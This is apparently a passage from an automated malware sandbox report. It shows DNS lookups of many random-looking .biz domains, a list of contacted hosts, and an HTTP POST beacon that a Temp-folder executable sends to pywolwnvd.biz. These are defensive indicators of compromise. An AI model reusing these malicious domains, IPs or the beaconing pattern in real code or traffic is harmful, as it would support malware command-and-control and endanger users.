                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.214354992 CET1.1.1.1192.168.2.70x32a5No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.520189047 CET1.1.1.1192.168.2.70xf755No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.394349098 CET1.1.1.1192.168.2.70xfd74No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.394349098 CET1.1.1.1192.168.2.70xfd74No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.058674097 CET1.1.1.1192.168.2.70xfdc3No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.880330086 CET1.1.1.1192.168.2.70xb9a2No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.894934893 CET1.1.1.1192.168.2.70x448bNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:53.008541107 CET1.1.1.1192.168.2.70x2c8dNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:54.885571003 CET1.1.1.1192.168.2.70xc556No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:56.161777020 CET1.1.1.1192.168.2.70x5bc5No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.391324043 CET1.1.1.1192.168.2.70x8a91No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.467752934 CET1.1.1.1192.168.2.70x92ccNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.419487000 CET1.1.1.1192.168.2.70xd97eNo error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.117012024 CET1.1.1.1192.168.2.70xa1d1No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.227364063 CET1.1.1.1192.168.2.70x6d0eNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.126497030 CET1.1.1.1192.168.2.70x87e5No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.782782078 CET1.1.1.1192.168.2.70x42e0No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.056792974 CET1.1.1.1192.168.2.70x354No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.511260986 CET1.1.1.1192.168.2.70x3597No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.577342987 CET1.1.1.1192.168.2.70x9824No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.592994928 CET1.1.1.1192.168.2.70x33a8No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.071193933 CET1.1.1.1192.168.2.70xf3eNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.433407068 CET1.1.1.1192.168.2.70x74deNo error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.910845041 CET1.1.1.1192.168.2.70x14b3No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.485814095 CET1.1.1.1192.168.2.70x7cadNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.485814095 CET1.1.1.1192.168.2.70x7cadNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.602847099 CET1.1.1.1192.168.2.70x6a45No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.858747959 CET1.1.1.1192.168.2.70x8c3bNo error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.022099018 CET1.1.1.1192.168.2.70x331fNo error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.834522009 CET1.1.1.1192.168.2.70x3a4fNo error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.850425959 CET1.1.1.1192.168.2.70x3607No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.589813948 CET1.1.1.1192.168.2.70xe211No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.053208113 CET1.1.1.1192.168.2.70x3e30No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.392167091 CET1.1.1.1192.168.2.70x5e72No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.161825895 CET1.1.1.1192.168.2.70x3ec0No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.238250017 CET1.1.1.1192.168.2.70x31c4No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.045542955 CET1.1.1.1192.168.2.70xf46aNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.722193956 CET1.1.1.1192.168.2.70x8df8No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.396294117 CET1.1.1.1192.168.2.70xaaa9No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.891525984 CET1.1.1.1192.168.2.70x332No error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.100265980 CET1.1.1.1192.168.2.70x56dcNo error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.400401115 CET1.1.1.1192.168.2.70x1164No error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.561991930 CET1.1.1.1192.168.2.70x712cNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.073455095 CET1.1.1.1192.168.2.70x5d30No error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.247343063 CET1.1.1.1192.168.2.70x97c2No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.068376064 CET1.1.1.1192.168.2.70x7d75No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.210612059 CET1.1.1.1192.168.2.70xebc7No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.600533009 CET1.1.1.1192.168.2.70x1f14No error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.912170887 CET1.1.1.1192.168.2.70x2ecNo error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.912170887 CET1.1.1.1192.168.2.70x2ecNo error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.105413914 CET1.1.1.1192.168.2.70xa2f0No error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.824865103 CET1.1.1.1192.168.2.70x4ff7No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.428832054 CET1.1.1.1192.168.2.70x22b7No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.675997972 CET1.1.1.1192.168.2.70xec25No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.375482082 CET1.1.1.1192.168.2.70x9055No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.595531940 CET1.1.1.1192.168.2.70x6dbcNo error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.277899981 CET1.1.1.1192.168.2.70x618No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.379904032 CET1.1.1.1192.168.2.70x9d14No error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.166512012 CET1.1.1.1192.168.2.70xc56aNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.247818947 CET1.1.1.1192.168.2.70x6664No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.037100077 CET1.1.1.1192.168.2.70x99cbNo error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.092307091 CET1.1.1.1192.168.2.70x321bNo error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.949701071 CET1.1.1.1192.168.2.70x45c2No error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.642368078 CET1.1.1.1192.168.2.70x2757No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.748471975 CET1.1.1.1192.168.2.70x8e44No error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.341084957 CET1.1.1.1192.168.2.70x4723No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.604540110 CET1.1.1.1192.168.2.70x2a62No error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.765487909 CET1.1.1.1192.168.2.70x9a88No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.106720924 CET1.1.1.1192.168.2.70x7cf1No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.473191023 CET1.1.1.1192.168.2.70xc779No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.943305969 CET1.1.1.1192.168.2.70x2bdcNo error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.176996946 CET1.1.1.1192.168.2.70x6becNo error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.112297058 CET1.1.1.1192.168.2.70x66d7No error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.112297058 CET1.1.1.1192.168.2.70x66d7No error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.113336086 CET1.1.1.1192.168.2.70x66d7No error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.113336086 CET1.1.1.1192.168.2.70x66d7No error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.133760929 CET1.1.1.1192.168.2.70xfd9fNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.155404091 CET1.1.1.1192.168.2.70xfd9fNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.846528053 CET1.1.1.1192.168.2.70xdb49No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.591638088 CET1.1.1.1192.168.2.70xff2aNo error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.616041899 CET1.1.1.1192.168.2.70xb7adNo error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.452527046 CET1.1.1.1192.168.2.70xc6a7No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.143625021 CET1.1.1.1192.168.2.70xf26No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.022378922 CET1.1.1.1192.168.2.70x251bNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.155771971 CET1.1.1.1192.168.2.70x28eNo error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.155805111 CET1.1.1.1192.168.2.70x28eNo error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.017503023 CET1.1.1.1192.168.2.70xe726No error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.526622057 CET1.1.1.1192.168.2.70xce04No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.002403975 CET1.1.1.1192.168.2.70x2b7eNo error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.424093962 CET1.1.1.1192.168.2.70xa417No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.688081026 CET1.1.1.1192.168.2.70x4589No error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.383866072 CET1.1.1.1192.168.2.70xc2No error (0)vnvbt.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.896861076 CET1.1.1.1192.168.2.70x5d4No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.262176037 CET1.1.1.1192.168.2.70x4130No error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.941510916 CET1.1.1.1192.168.2.70xa224No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.571365118 CET1.1.1.1192.168.2.70xe48dNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.134430885 CET1.1.1.1192.168.2.70xab29No error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.264435053 CET1.1.1.1192.168.2.70xc6adNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.264435053 CET1.1.1.1192.168.2.70xc6adNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.842132092 CET1.1.1.1192.168.2.70x3418No error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.702601910 CET1.1.1.1192.168.2.70xa6e2No error (0)giliplg.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.732208014 CET1.1.1.1192.168.2.70x828fName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.738410950 CET1.1.1.1192.168.2.70xa774No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.741246939 CET1.1.1.1192.168.2.70x27aeNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.597167015 CET1.1.1.1192.168.2.70xeeaeNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.235400915 CET1.1.1.1192.168.2.70x79bdName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.244580030 CET1.1.1.1192.168.2.70xc74dName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.252717972 CET1.1.1.1192.168.2.70x7e9eNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.097012997 CET1.1.1.1192.168.2.70xa513No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.958441973 CET1.1.1.1192.168.2.70xf7bfNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.640697002 CET1.1.1.1192.168.2.70xb136No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.640697002 CET1.1.1.1192.168.2.70xb136No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.050741911 CET1.1.1.1192.168.2.70xf1caName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.058545113 CET1.1.1.1192.168.2.70x8f44No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.090626955 CET1.1.1.1192.168.2.70x8f44No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.626684904 CET1.1.1.1192.168.2.70xae01Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.635644913 CET1.1.1.1192.168.2.70x539aName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.644619942 CET1.1.1.1192.168.2.70x41No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • shpwbsrw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • cjvgcl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • neazudmrq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • mjheo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • wluwplyh.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49883 | 54.244.188.177 | 80 | 2724 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:50.390866041 CET | 348 | OUT | POST /bkk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pywolwnvd.biz
